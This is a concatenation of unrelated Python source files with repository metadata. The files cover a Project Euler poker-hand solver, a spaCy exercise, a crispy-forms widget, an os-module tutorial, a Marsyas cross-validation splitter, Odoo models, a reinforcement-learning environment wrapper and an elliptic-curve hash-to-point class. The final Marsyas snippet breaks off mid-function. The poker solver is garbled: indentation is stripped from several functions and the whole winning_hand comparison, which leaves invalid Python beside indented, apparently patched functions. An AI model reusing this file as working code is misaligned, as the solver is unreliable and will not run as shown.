2020-02-11T02:03:02.000Z
|
2020-02-11T02:03:02.000Z
|
Project Euler Qusetions 51 - 60/Project Euler Question 54.py
|
Clayton-Threm/Coding-Practice
|
6671e8a15f9e797338caa617dae45093f4157bc1
|
[
"MIT"
] | null | null | null |
Project Euler Qusetions 51 - 60/Project Euler Question 54.py
|
Clayton-Threm/Coding-Practice
|
6671e8a15f9e797338caa617dae45093f4157bc1
|
[
"MIT"
] | null | null | null |
#Project Euler Question 54
#Poker hands
poker_file = open(r"C:\Users\Clayton\Documents\Python Other Files\p054_poker.txt")
content = poker_file.read()
content = content.replace(" ", "")
content = content.split("\n")
card_values = {"2": 2, "3": 3, "4": 4, "5": 5, "6": 6, "7": 7, "8": 8, "9": 9, "T": 10, "J": 11, "Q": 12, "K": 13, "A": 14}
def royal_flush(hand, suits):
    # all five cards must share one suit and be exactly T J Q K A
    if len(suits) != 1:
        return []
    royal_values = ["T", "J", "Q", "K", "A"]
    for value in royal_values:
        if value not in hand:
            return []
    return "A"
def straight_flush(hand, suits):
    # one suit and five consecutive values; returns the high card on success
    if len(suits) != 1:
        return []
    values = sorted(card_values[card] for card in hand)
    for c1 in range(4):
        if values[c1 + 1] - values[c1] != 1:
            return []
    return list(card_values.keys())[list(card_values.values()).index(values[4])]
def four_of_a_kind(hand, suits):
for card in hand:
if hand.count(card) > 3:
return card
return []
def full_house(hand, suits):
    # three of one value plus a pair; returns the triple's card on success
    hand_check = hand.copy()
    triple_card = None
    for card in hand_check:
        if hand_check.count(card) > 2:
            triple_card = card
            while card in hand_check:
                hand_check.remove(card)
            break
    else:
        return []
    # the old code returned on the first leftover card, missing pairs that
    # did not come first; scan all remaining cards instead
    for card in hand_check:
        if hand_check.count(card) > 1:
            return triple_card
    return []
def flush(hand, suits):
    # one suit; return the highest card by value (sorting the characters
    # themselves would rank 'Q' above 'A')
    if len(suits) == 1:
        return max(hand, key=lambda card: card_values[card])
    return []
def straight(hand, suits):
    # five consecutive values (A-2-3-4-5 counts low); returns the high card
    low_values = ["A", "2", "3", "4", "5"]
    for value in low_values:
        if value not in hand:
            break
    else:
        return "5"
    values = sorted(card_values[card] for card in hand)
    for c1 in range(4):
        if values[c1 + 1] - values[c1] != 1:
            return []
    return list(card_values.keys())[list(card_values.values()).index(values[4])]
def three_of_a_kind(hand, suits):
for card in hand:
if hand.count(card) > 2:
return card
return []
def two_pair(hand, suits):
    # returns the two paired cards, low then high, on success
    hand_check = [card_values[card] for card in hand]
    counter = 0
    high_cards = []
    for card in list(hand_check):  # iterate over a snapshot while removing
        if hand_check.count(card) > 1:
            counter += 1
            high_cards.append(card)
            while card in hand_check:
                hand_check.remove(card)
    if counter == 2:
        high_cards.sort()
        return [list(card_values.keys())[list(card_values.values()).index(card)] for card in high_cards]
    return []
def one_pair(hand, suits):
for card in hand:
if hand.count(card) > 1:
return card
return []
def high_card(hand, suits):
    # returns the card with the highest value; avoids the unbound-name bug
    # the old "highest = 2" seed had when every remaining card was a 2
    return max(hand, key=lambda card: card_values[card])
def winning_hand(h1, s1, h2, s2):
check_1 = royal_flush(h1, s1)
check_2 = royal_flush(h2, s2)
if len(check_1) > 0:
return True
elif len(check_2) > 0:
return False
else:
check_1 = straight_flush(h1, s1)
check_2 = straight_flush(h2, s2)
#Royal Flush to Straight Flush
if len(check_1) > 0:
if len(check_2) > 0:
if card_values[check_1] > card_values[check_2]:
return True
else:
return False
else:
return True
elif len(check_2) > 0:
return False
else:
check_1 = four_of_a_kind(h1, s1)
check_2 = four_of_a_kind(h2, s2)
#Straight Flush to Four of a Kind
if len(check_1) > 0:
if len(check_2) > 0:
if card_values[check_1] > card_values[check_2]:
return True
else:
return False
else:
return True
elif len(check_2) > 0:
return False
else:
check_1 = full_house(h1, s1)
check_2 = full_house(h2, s2)
#Four of a Kind to Full House
if len(check_1) > 0:
if len(check_2) > 0:
if card_values[check_1] > card_values[check_2]:
return True
else:
return False
else:
return True
elif len(check_2) > 0:
return False
else:
check_1 = flush(h1, s1)
check_2 = flush(h2, s2)
#Full House to Flush
if len(check_1) > 0:
if len(check_2) > 0:
if card_values[check_1] > card_values[check_2]:
return True
else:
return False
else:
return True
elif len(check_2) > 0:
return False
else:
check_1 = straight(h1, s1)
check_2 = straight(h2, s2)
#Flush to Straight
if len(check_1) > 0:
if len(check_2) > 0:
if card_values[check_1] > card_values[check_2]:
return True
else:
return False
else:
return True
elif len(check_2) > 0:
return False
else:
check_1 = three_of_a_kind(h1, s1)
check_2 = three_of_a_kind(h2, s2)
#Straight to Three of a Kind
if len(check_1) > 0:
if len(check_2) > 0:
if card_values[check_1] > card_values[check_2]:
return True
else:
return False
else:
return True
elif len(check_2) > 0:
return False
else:
check_1 = two_pair(h1, s1)
check_2 = two_pair(h2, s2)
#Three of a Kind to Two Pair
if len(check_1) > 0:
if len(check_2) > 0:
if card_values[check_1[1]] > card_values[check_2[1]]:
return True
elif card_values[check_2[1]] > card_values[check_1[1]]:
return False
elif card_values[check_1[0]] > card_values[check_2[0]]:
return True
elif card_values[check_2[0]] > card_values[check_1[0]]:
return False
else:
h1_copy = h1.copy()
h2_copy = h2.copy()
for term in check_1:
while term in h1_copy:
h1_copy.remove(term)
for term in check_2:
while term in h2_copy:
h2_copy.remove(term)
check_1 = one_pair(h1_copy, s1)
check_2 = one_pair(h2_copy, s2)
if len(check_1) > 0:
if len(check_2) > 0:
if card_values[check_1] > card_values[check_2]:
return True
elif card_values[check_2] > card_values[check_1]:
return False
else:
h1_copy = h1.copy()
h2_copy = h2.copy()
while check_1 in h1_copy:
h1_copy.remove(check_1)
while check_2 in h2_copy:
h2_copy.remove(check_2)
check_1 = high_card(h1_copy, s1)
check_2 = high_card(h2_copy, s2)
if card_values[check_1] > card_values[check_2]:
return True
elif card_values[check_2] > card_values[check_1]:
return False
else:
return None
else:
return True
else:
return True
elif len(check_2) > 0:
return False
else:
check_1 = one_pair(h1, s1)
check_2 = one_pair(h2, s2)
#Two Pair to One Pair
if len(check_1) > 0:
if len(check_2) > 0:
if card_values[check_1] > card_values[check_2]:
return True
elif card_values[check_2] > card_values[check_1]:
return False
else:
h1_copy = h1.copy()
h2_copy = h2.copy()
while check_1 in h1_copy:
h1_copy.remove(check_1)
while check_2 in h2_copy:
h2_copy.remove(check_2)
check_1 = high_card(h1_copy, s1)
check_2 = high_card(h2_copy, s2)
for x in range(0,3):
if card_values[check_1] > card_values[check_2]:
return True
elif card_values[check_2] > card_values[check_1]:
return False
else:
while check_1 in h1_copy:
h1_copy.remove(check_1)
while check_2 in h2_copy:
h2_copy.remove(check_2)
check_1 = high_card(h1_copy, s1)
check_2 = high_card(h2_copy, s2)
else:
return True
elif len(check_2) > 0:
return False
else:
check_1 = high_card(h1, s1)
check_2 = high_card(h2, s2)
#One Pair to High Card
h1_copy = h1.copy()
h2_copy = h2.copy()
for x in range(0,5):
if card_values[check_1] > card_values[check_2]:
return True
elif card_values[check_2] > card_values[check_1]:
return False
else:
while check_1 in h1_copy:
h1_copy.remove(check_1)
while check_2 in h2_copy:
h2_copy.remove(check_2)
check_1 = high_card(h1_copy, s1)
check_2 = high_card(h2_copy, s2)
win1_list = 0
for row in content:
if len(row) == 0:
continue
hand_1 = [card for card in row[0:10:2]]
suits_1 = {card for card in row[1:11:2]}
hand_2 = [card for card in row[10::2]]
suits_2 = {card for card in row[11::2]}
#print (hand_1, hand_2)
#print (suits_1, suits_2)
winner_1 = winning_hand(hand_1, suits_1, hand_2, suits_2)
#print (winner_1)
#print ()
if winner_1 is True:
win1_list += 1
print(win1_list)
poker_file.close()
| 30.417867 | 123 | 0.499005 |
c18f66e59681c1445680e3e28e060eb30be673e1
| 294 |
py
|
Python
|
exercises/zh/solution_01_03_02.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | 2 |
2020-07-07T01:46:37.000Z
|
2021-04-20T03:19:43.000Z
|
exercises/zh/solution_01_03_02.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | null | null | null |
exercises/zh/solution_01_03_02.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | null | null | null |
# Import spaCy and create a Chinese nlp object
import spacy
nlp = spacy.blank("zh")
# Process the text
doc = nlp("我喜欢老虎和狮子。")
# Iterate over the doc and print each token
for i, token in enumerate(doc):
print(i, token.text)
# 截取Doc中"老虎"的部分
laohu = doc[2:3]
print(laohu.text)
# 截取Doc中"老虎和狮子"的部分(不包括"。")
laohu_he_shizi = doc[2:5]
print(laohu_he_shizi.text)
| 14.7 | 31 | 0.693878 |
e75ac09c2a77743163fc9a7eef60621ee4d5f737
| 73 |
py
|
Python
|
geek/geek2.py
|
lcarlin/guppe
|
a0ee7b85e8687e8fb8243fbb509119a94bc6460f
|
[
"Apache-2.0"
] | 1 |
2021-12-18T15:29:24.000Z
|
2021-12-18T15:29:24.000Z
|
geek/geek2.py
|
lcarlin/guppe
|
a0ee7b85e8687e8fb8243fbb509119a94bc6460f
|
[
"Apache-2.0"
] | null | null | null |
geek/geek2.py
|
lcarlin/guppe
|
a0ee7b85e8687e8fb8243fbb509119a94bc6460f
|
[
"Apache-2.0"
] | 3 |
2021-08-23T22:45:20.000Z
|
2022-02-17T13:17:09.000Z
|
curso = 'Programacao em Python Essencial'
def funcao2():
return curso
| 24.333333 | 41 | 0.739726 |
99c5a029da3e80813cafe7ce1eafb5c5709261cd
| 1,442 |
py
|
Python
|
backend/apps/iamstudent/custom_crispy.py
|
match4healthcare/match4healthcare
|
acf69e3b781d715f0a947c2a9df6646e94f1ca6b
|
[
"MIT"
] | 2 |
2020-03-28T13:56:39.000Z
|
2020-03-29T10:16:12.000Z
|
backend/apps/iamstudent/custom_crispy.py
|
match4healthcare/match4healthcare
|
acf69e3b781d715f0a947c2a9df6646e94f1ca6b
|
[
"MIT"
] | 76 |
2020-03-27T21:53:04.000Z
|
2020-03-30T20:27:43.000Z
|
backend/apps/iamstudent/custom_crispy.py
|
match4healthcare/match4healthcare
|
acf69e3b781d715f0a947c2a9df6646e94f1ca6b
|
[
"MIT"
] | null | null | null |
from crispy_forms.bootstrap import Field
from crispy_forms.utils import TEMPLATE_PACK
class InputButtonGroup(Field):
"""
Layout object for rendering radio and checkbox elements as button groups::.
RadioButtons('field_name', [option_label_class="btn blue text-white btn-lg"])
"""
template = "%s/layout/input_buttongroup.html"
def __init__(self, *args, **kwargs):
try:
self.input_type
except AttributeError:
raise NotImplementedError(
"Cannot instantiate {}. input_type property must be set".format(
type(self).__name__
)
)
self.option_label_class = "btn btn-secondary"
if "option_label_class" in kwargs:
self.option_label_class = kwargs.pop("option_label_class")
        super(InputButtonGroup, self).__init__(*args, **kwargs)
def render(self, form, form_style, context, template_pack=TEMPLATE_PACK, **kwargs):
return super(InputButtonGroup, self).render(
form,
form_style,
context,
template_pack=template_pack,
extra_context={
"input_type": self.input_type,
"option_label_class": self.option_label_class,
},
)
class RadioButtons(InputButtonGroup):
input_type = "radio"
class CheckboxButtons(InputButtonGroup):
input_type = "checkbox"
| 29.428571 | 87 | 0.627601 |
823f28c32d2bd546b4cbff92817ad336d78d019e
| 1,537 |
py
|
Python
|
src/python3_learn_video/os_module.py
|
HuangHuaBingZiGe/GitHub-Demo
|
f3710f73b0828ef500343932d46c61d3b1e04ba9
|
[
"Apache-2.0"
] | null | null | null |
src/python3_learn_video/os_module.py
|
HuangHuaBingZiGe/GitHub-Demo
|
f3710f73b0828ef500343932d46c61d3b1e04ba9
|
[
"Apache-2.0"
] | null | null | null |
src/python3_learn_video/os_module.py
|
HuangHuaBingZiGe/GitHub-Demo
|
f3710f73b0828ef500343932d46c61d3b1e04ba9
|
[
"Apache-2.0"
] | null | null | null |
"""
模块是一个包含所有你定义的函数和变量的文件,其后缀名是.py
模块可以被别的程序引入,以使用该模块中的函数等功能
OS:Operation System 操作系统
"""
import os
print('-------------------------------')
print(os.getcwd())  # get the current working directory
print('-------------------------------')
os.chdir('E:\\')  # change the current working directory
print(os.getcwd())
print('-------------------------------')
print(os.listdir('E:\\'))  # print the files and folders under the given directory
print('-------------------------------')
# os.mkdir('E:\\A')  # create a folder
# os.mkdir('E:\\A\\B')  # create a nested folder whose parent already exists
# os.makedirs('E:\\B\\C')  # create nested folders recursively
# os.makedirs('E:\\B\\A')  # create nested folders recursively
# os.system('cmd')  # open cmd
# os.system('calc')  # open the calculator
print(os.curdir)  # the current directory ('.')
print(os.listdir(os.curdir))  # list files and folders in the current directory
print('-------------------------------')
print(os.path.basename('E:\\oracle\\hosts'))  # strip the path, return the file name
print('-------------------------------')
print(os.path.dirname('E:\\oracle\\hosts'))  # strip the file name, return the path
print('-------------------------------')
print(os.path.join('A', 'B', 'C'))
print(os.path.join(r'C:\\', 'A', 'B', 'C'))
print(os.path.split('E:\\A\\SEXY.AVI'))
print(os.path.split('E:\\A\\B\\C'))
print('-------------------------------')
print(os.path.splitext('E:\\A\\SEXY.AVI'))  # split off the file extension
print('-------------------------------')
print(os.path.getatime('E:\\test.txt'))
import time
print(time.gmtime(os.path.getatime('E:\\test.txt')))
print('-------------------------------')
print(time.localtime(os.path.getatime('E:\\test.txt')))
print('-------------------------------')
print(time.localtime(os.path.getmtime('E:\\test.txt')))
print('-------------------------------')
| 26.964912 | 57 | 0.476252 |
41a74400b4de35df5aeeefe5d76a35e9bb6146d7
| 2,084 |
py
|
Python
|
marsyas-vamp/marsyas/scripts/Python/make-bextract-splits.py
|
jaouahbi/VampPlugins
|
27c2248d1c717417fe4d448cdfb4cb882a8a336a
|
[
"Apache-2.0"
] | null | null | null |
marsyas-vamp/marsyas/scripts/Python/make-bextract-splits.py
|
jaouahbi/VampPlugins
|
27c2248d1c717417fe4d448cdfb4cb882a8a336a
|
[
"Apache-2.0"
] | null | null | null |
marsyas-vamp/marsyas/scripts/Python/make-bextract-splits.py
|
jaouahbi/VampPlugins
|
27c2248d1c717417fe4d448cdfb4cb882a8a336a
|
[
"Apache-2.0"
] | null | null | null |
#!/global/scratch/sness/openmir/tools/python/bin/python
#
#
#
import sys
import re
import random
def run(inFilename,outPrefix,numFolds):
inFile = open(inFilename, "r")
line = inFile.readline()
data = {}
while line:
m = re.search('(.*)\t(.*)', line)
if m is not None:
filename = m.group(1)
label = m.group(2)
if label not in data:
data[label] = []
data[label].append(filename)
line = inFile.readline()
# Randomly shuffle folds
for label in data:
random.shuffle(data[label])
# Make new data structure divided into folds
folds = {}
for i in range(0,numFolds):
folds[i] = {}
for label in data:
folds[i][label] = []
# Create folds from data
fold = 0
for label in data:
while data[label]:
popped = data[label].pop()
folds[fold][label].append(popped)
fold += 1
if fold >= numFolds:
fold = 0
# Write data to files
for i in range(0,numFolds):
trainFile = open("%s-train-%i" % (outPrefix,i), "w")
testFile = open("%s-test-%i" % (outPrefix,i), "w")
for j in range(0,numFolds):
for label in folds[j]:
for item in folds[j][label]:
if j == i:
testFile.write("%s\t%s\n" % (item,label))
else:
trainFile.write("%s\t%s\n" % (item,label))
trainFile.close()
testFile.close()
if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("Usage: make-bextract-splits.py bextract.mf prefix- numFolds")
        sys.exit(1)
inFilename = sys.argv[1]
outPrefix = sys.argv[2]
numFolds = int(sys.argv[3])
run(inFilename,outPrefix,numFolds)
| 24.232558 | 86 | 0.518234 |
d43169921a12e287804bfbe3ee39625b50cfcf93
| 303 |
py
|
Python
|
src/bo4e/enum/strenum.py
|
bo4e/BO4E-python
|
28b12f853c8a496d14b133759b7aa2d6661f79a0
|
[
"MIT"
] | 1 |
2022-03-02T12:49:44.000Z
|
2022-03-02T12:49:44.000Z
|
src/bo4e/enum/strenum.py
|
bo4e/BO4E-python
|
28b12f853c8a496d14b133759b7aa2d6661f79a0
|
[
"MIT"
] | 21 |
2022-02-04T07:38:46.000Z
|
2022-03-28T14:01:53.000Z
|
src/bo4e/enum/strenum.py
|
bo4e/BO4E-python
|
28b12f853c8a496d14b133759b7aa2d6661f79a0
|
[
"MIT"
] | null | null | null |
"""
strenum contains an enum that inherits from the plain enum and string.
"""
from enum import Enum
# pylint: disable=too-few-public-methods
class StrEnum(str, Enum):
"""
An enum that has string values.
"""
# see https://docs.python.org/3/library/enum.html?highlight=strenum#others
| 20.2 | 78 | 0.69637 |
9931776b61aedd8331ad2a90cae76c20aba15482
| 276 |
py
|
Python
|
demo.py
|
tlee753/sharing-sequence
|
1aae08b5eacefd9b3d88e5befe2453151210922c
|
[
"MIT"
] | null | null | null |
demo.py
|
tlee753/sharing-sequence
|
1aae08b5eacefd9b3d88e5befe2453151210922c
|
[
"MIT"
] | null | null | null |
demo.py
|
tlee753/sharing-sequence
|
1aae08b5eacefd9b3d88e5befe2453151210922c
|
[
"MIT"
] | null | null | null |
import sys
def demo(x):
    # Apply the Thue-Morse-style morphism A -> AB, B -> BA x times,
    # starting from "AB"; e.g. demo(1) prints "ABBA".
    output = "AB"
    for i in range(x):
        temp = ""
        for l in output:
            if l == 'A':
                temp += "AB"
            else:
                temp += "BA"
        output = temp
    print(output)
demo(int(sys.argv[1]))
| 17.25 | 28 | 0.394928 |
993db96065f109d3d5d76b32a4d8be59528b6cb1
| 383 |
py
|
Python
|
Weboffice/woa_contacts/models/crm_phonecall.py
|
whoedl61/webinaroctubre
|
a22048838062999753860995d21328cb9d53d652
|
[
"MIT"
] | null | null | null |
Weboffice/woa_contacts/models/crm_phonecall.py
|
whoedl61/webinaroctubre
|
a22048838062999753860995d21328cb9d53d652
|
[
"MIT"
] | null | null | null |
Weboffice/woa_contacts/models/crm_phonecall.py
|
whoedl61/webinaroctubre
|
a22048838062999753860995d21328cb9d53d652
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from odoo import fields, models
class CrmPhonecall(models.Model):
_inherit = 'crm.phonecall'
sale_order_ids = fields.Many2one(
comodel_name='sale.order',
)
class CrmPhonecall2(models.Model):
_inherit = 'crm.phonecall'
crm_lead_ids = fields.Many2one(
comodel_name='crm.lead',
)
| 20.157895 | 39 | 0.668407 |
51e0e33ddbe206b0d56ce2aab6123557e1a4198f
| 1,435 |
py
|
Python
|
Utils/py/RL_ActionSelection/env_0/env.py
|
tarsoly/NaoTH
|
dcd2b67ef6bf9953c81d3e1b26e543b5922b7d52
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
Utils/py/RL_ActionSelection/env_0/env.py
|
tarsoly/NaoTH
|
dcd2b67ef6bf9953c81d3e1b26e543b5922b7d52
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
Utils/py/RL_ActionSelection/env_0/env.py
|
tarsoly/NaoTH
|
dcd2b67ef6bf9953c81d3e1b26e543b5922b7d52
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
#################################
# #
# /\/\/\/\/\/\/\/\/\/\/\/\ #
# \/\/\/\/\/\/\/\/\/\/\/\/ #
# #
# Environment wrapper #
# #
# /\/\/\/\/\/\/\/\/\/\/\/\ #
# \/\/\/\/\/\/\/\/\/\/\/\/ #
# #
#################################
import gym # import gym for action spaces
from rl import core # import Keras reinforcement learning
import numpy as np
import world
class Env(core.Env):
# Environment class
# build as needed for keras-rl (https://github.com/keras-rl/keras-rl/blob/master/rl/core.py)
reward_range = (-np.inf, np.inf)
action_space = gym.spaces.Discrete(5)
observation_space = gym.spaces.MultiBinary(872) # type: MultiBinary TODO: make derivable
def __init__(self, reward, features):
# reward and features are function, for further details see world class
self.world = world.World(reward, features)
def step(self, action=None):
next_state, reward, done, info = self.world.step(action)
return next_state, reward, done, info
def render(self):
        # maybe implement in the future:
# visualize traces and agent movement on field
self.world.render()
def close(self):
self.world.close()
def reset(self):
observation = self.world.reset()
return observation
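# A minimal usage sketch (added; assumes reward and feature functions with the
# interface expected by the world module):
#
#   env = Env(my_reward_fn, my_feature_fn)
#   observation = env.reset()
#   next_state, reward, done, info = env.step(action=0)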
| 29.285714 | 96 | 0.510801 |
7a63c3d9ac53f87b8ddb8e62f13c5bfc49d13609
| 8,366 |
py
|
Python
|
fspke/icarthash.py
|
jadeblaquiere/pyfspke
|
1c7305e8a28639e55b1620e731a5dd7c312c295b
|
[
"BSD-3-Clause"
] | null | null | null |
fspke/icarthash.py
|
jadeblaquiere/pyfspke
|
1c7305e8a28639e55b1620e731a5dd7c312c295b
|
[
"BSD-3-Clause"
] | null | null | null |
fspke/icarthash.py
|
jadeblaquiere/pyfspke
|
1c7305e8a28639e55b1620e731a5dd7c312c295b
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright (c) 2017, Joseph deBlaquiere <[email protected]>
# All rights reserved
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of ecpy nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import fspke.rabinmiller as rabinmiller
from fspke.cwhash import CWHashFunction
from ecpy.point import Point, Generator
from Crypto.Random import random
def _modinv(a, m):
# Extended Euclidean Algorithm for finding inverse
lastr, r, x, lastx = a, m, 0, 1
while r:
lastr, (q, r) = r, divmod(lastr, r)
x, lastx = lastx - q*x, x
return lastx % m
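# Added example: _modinv(3, 10) == 7, since (3 * 7) % 10 == 1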
class IcartHash (object):
"""IcartHash uses the method proposed by Thomas Icart(1) and extended by
Eric Brier et. al.(2) to hash a N-bit integer value into to a elliptic
curve group defined over a finite field, E(Fp), where 2**N > q and E is
in the Short Weierstrass for y**2 = x**3 + ax + b with Generator G and
order n.
(1) : Thomas Icart, "How to Hash into Elliptic Curves", CRYPTO2009,
https://eprint.iacr.org/2009/226.pdf
(2) : Eric Brier et. al., "Efficient Indifferentiable Hashing into
Ordinary Elliptic Curves", CRYPTO2010,
https://eprint.iacr.org/2009/340.pdf
"""
def __init__(self, q, a, b, G, n):
""""""
if (q != int(q)) or (q < 3):
raise ValueError("Invalid Input: q should be a positive integer")
if (a != int(a)) or (a < 0):
raise ValueError("Invalid Input")
if (b != int(b)) or (b < 0):
raise ValueError("Invalid Input")
if rabinmiller.isPrime(q) is not True:
raise ValueError("Invalid Input: q must be prime")
if (q % 3) != 2:
raise ValueError("Invalid Input: q must be congruent to 2 (mod 3)")
if (len(G) != 2):
raise ValueError("Invalid Input: G must be a tuple (dimension 2)")
if (G[0] != int(G[0])) or (G[0] < 0):
raise ValueError("Invalid Input")
if (G[1] != int(G[1])) or (G[1] < 0):
raise ValueError("Invalid Input")
if (n != int(n)) or (n < 0):
raise ValueError("Invalid Input")
self.q = int(q)
self.a = int(a)
self.b = int(b)
self.curve = {"p": self.q,
"bits": self.q.bit_length(),
"n": int(n),
"a": self.a,
"b": self.b,
"G": (G[0], G[1])}
# print("curve =", self.curve)
self.G = Generator.init(G[0], G[1], curve=self.curve)
# precalculate some constants (inverses of 3, 2, 27) in Fq
self._3inv = pow(3, self.q - 2, self.q)
# print("_3inv =", self._3inv)
assert ((3 * self._3inv) % self.q) == 1
self._cubeRtExp = _modinv(3, self.q - 1)
# print("_cubeRtExp =", self._3inv)
assert ((3 * self._cubeRtExp) % (self.q-1)) == 1
self._27inv = pow(27, self.q - 2, self.q)
# print("_27inv =", self._27inv)
assert ((27 * self._27inv) % self.q) == 1
self._3a = (3 * a) % self.q
# set up H1, H2 as two random uniform hash functions based on
# the Carter and Wegman construction
self.H1 = CWHashFunction(self.q)
self.H2 = CWHashFunction(self.q)
def serialize(self):
config = {}
config['q'] = self.q
config['a'] = self.a
config['b'] = self.b
config['G'] = (self.G.affine()[0], self.G.affine()[1])
config['n'] = self.curve['n']
config['H1'] = self.H1.serialize()
config['H2'] = self.H2.serialize()
return config
@staticmethod
def deserialize(config):
H = IcartHash(config['q'], config['a'], config['b'],
config['G'], config['n'])
H.H1 = CWHashFunction.deserialize(config['H1'])
H.H2 = CWHashFunction.deserialize(config['H2'])
return H
def _cubeRoot(self, x):
return pow(x, self._cubeRtExp, self.q)
def deterministicMap(self, n):
"""Using the original algorithm proposed by Thomas Icart, calculates
a point on E(Fq) assuming n is a member of Fq. H(0) is mapped to O
(point at infinity). Points are calculated in affine coordinates and
returned as a Point Object.
Note: deterministicMap reliably maps Fq to E(Fq), but as not all points
on the curve can be parameterized, the results are not uniform and the
distribution is differentiable from a collection of random points
"""
if (n != int(n)) or (n < 0):
raise ValueError("Invalid Input")
if n == 0:
return Point(infinity=True, curve=self.curve)
# just to be sure, force x to be a member of Fq
u = int(n) % self.q
# print("u = ", u)
u6_inv = pow((6 * u) % self.q, self.q - 2, self.q)
assert ((6 * u * u6_inv) % self.q) == 1
v = ((self._3a - pow(u, 4, self.q)) * u6_inv) % self.q
u_6 = pow(u, 6, self.q)
# print ("u_6 =", u_6)
# print ("27_inv =", self._27inv)
u_6o27 = (pow(u, 6, self.q) * self._27inv) % self.q
assert ((u_6o27 * 27) % self.q) == u_6
foo = ((pow(v, 2, self.q) - self.b) - u_6o27) % self.q
# print ("foo = ", foo)
curootfoo = self._cubeRoot(foo)
# print ("curootfoo = ", curootfoo)
assert(pow(curootfoo, 3, self.q) == foo)
u_2 = pow(u, 2, self.q)
u_2o3 = (pow(u, 2, self.q) * self._3inv) % self.q
assert ((u_2o3 * 3) % self.q) == u_2
x = (curootfoo + u_2o3) % self.q
y = ((u * x) + v) % self.q
return Point(x, y, infinity=False, curve=self.curve)
def uniformMap(self, n):
"""UniformMap maps values from Fq to E(Fq) in a uniform manner by
elliptic curve point multiplication. While this does produce a uniform
mapping within the ring of the generator point, using this map exposes
the discrete logarithm of the resultant point (as log.G = n).
"""
if (n != int(n)) or (n < 0):
raise ValueError("Invalid Input")
if n == 0:
return Point(infinity=True, curve=self.curve)
# just to be sure, force x to be a member of Fq
u = int(n) % self.q
return (self.G * u)
def hashval(self, n):
"""hashval calculates a secure, uniform hash from an N-bit input
by using two Universal Hash functions to hash from {0,1}**N -> Fp
and the summing the results of mapping these values using the
deterministic (Icart) map and the uniform (E.C. Point Multiplication)
mappings.
hashval takes an integer as input and returns the compressed
representation of the point as a string.
"""
h = (self.deterministicMap(self.H1.hashval(n)) +
self.uniformMap(self.H2.hashval(n)))
if h.is_infinite:
return ('0' * (2 + ((self.curve['bits'] + 7) // 8)), True)
else:
return (h.compress().decode(), False)
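# A minimal usage sketch (added; toy names only -- a real deployment would use
# standardized curve parameters q, a, b, G, n with q prime and q % 3 == 2):
#
#   H = IcartHash(q, a, b, (Gx, Gy), n)
#   digest, at_infinity = H.hashval(12345)
#   H2 = IcartHash.deserialize(H.serialize())  # round-trips the hash config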
| 43.34715 | 80 | 0.596701 |
710180788e46fb9672dd2581b521808730d01041
| 347 |
py
|
Python
|
src/onegov/ticket/__init__.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/ticket/__init__.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/ticket/__init__.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from onegov.ticket.handler import Handler, HandlerRegistry
handlers = HandlerRegistry() # noqa
from onegov.ticket.model import Ticket
from onegov.ticket.model import TicketPermission
from onegov.ticket.collection import TicketCollection
__all__ = [
'Handler',
'handlers',
'Ticket',
'TicketCollection',
'TicketPermission'
]
| 21.6875 | 58 | 0.755043 |
a4548570e9100b45dc7f3ed1d57f183d03d53890
| 2,624 |
py
|
Python
|
marsyas-vamp/marsyas/src/marsyas_python/chuck_like.py
|
jaouahbi/VampPlugins
|
27c2248d1c717417fe4d448cdfb4cb882a8a336a
|
[
"Apache-2.0"
] | null | null | null |
marsyas-vamp/marsyas/src/marsyas_python/chuck_like.py
|
jaouahbi/VampPlugins
|
27c2248d1c717417fe4d448cdfb4cb882a8a336a
|
[
"Apache-2.0"
] | null | null | null |
marsyas-vamp/marsyas/src/marsyas_python/chuck_like.py
|
jaouahbi/VampPlugins
|
27c2248d1c717417fe4d448cdfb4cb882a8a336a
|
[
"Apache-2.0"
] | null | null | null |
import marsyas
import random
import math
def mtof(pitch):
return 440.0 * math.pow(2.0, (pitch-69.0) / 12.0)
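# Added examples: mtof(69) == 440.0 (A4) and mtof(81) == 880.0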
def set_freq(control, freq):
control.setValue_real(freq)
def dispatch(time, times, f, control, freq):
if (len(times) > 0):
